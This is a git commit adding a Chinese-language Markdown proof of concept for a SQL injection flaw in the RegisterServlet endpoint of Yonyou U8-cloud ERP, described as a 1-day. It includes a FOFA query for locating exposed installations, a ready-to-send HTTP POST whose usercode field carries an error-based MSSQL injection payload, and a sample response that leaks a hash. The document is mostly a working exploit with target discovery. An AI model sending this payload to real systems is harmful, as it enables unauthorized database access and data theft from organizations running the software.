Create 用友U8-cloud RegisterServlet接口存在SQL注入漏洞.md

2023-11-19 12:25:04 +08:00 · 2023-11-19 12:25:04 +08:00 · 5858755332
commit 5858755332
parent 1f18f14b76
1 changed files with 38 additions and 0 deletions
--- a/RegisterServlet接口存在SQL注入漏洞.md
+++ b/RegisterServlet接口存在SQL注入漏洞.md
@ -0,0 +1,38 @@
+## 用友U8-cloud RegisterServlet接口存在SQL注入漏洞
+U8 Cloud是用友公司推出的企业上云数字化平台，为成长型和创新型企业提供全面的云ERP解决方案。
+
+U8 cloud不同于传统的ERP，融合了交易、服务、管理于一体的整体解决方案。U8 cloud集中于企业内部管理管控，管理，规范、高效、协同、透明。通过云模式，低成本，快速部署，即租即用的帮助企业免除硬软件投入的快速搭建企业管理架构。通过云服务连接，业务模式、服务模式的经营创新。
+
+该系统RegisterServlet接口存在SQL注入漏洞，并且属于1day状态。
+
+## fofa
+```
+app="用友-U8-Cloud"
+```
+
+## poc
+发送下面的poc，响应包返回123456 的md5为存在漏洞
+```
+POST /servlet/RegisterServlet HTTP/1.1
+Host: ip:port
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
+Connection: close
+Content-Length: 85
+Accept: */*
+Accept-Language: en
+Content-Type: application/x-www-form-urlencoded
+X-Forwarded-For: 127.0.0.1
+Accept-Encoding: gzip
+
+usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
+```
+返回
+```
+HTTP/1.1 200 OK
+Connection: close
+Content-Length: 71Date: Mon, 13 Nov 2023 02:25:54 GMT
+Server: Apache-Coyote/1.1
+Set-Cookie: JSESSIONID=F66A9268A74114BADA7CB11346378B11.server;
+Path=/; HttpOnly
+Error:?? nvarchar ? 'e10adc3949ba59abbe56e057f20f883e' ??????? int ????
+```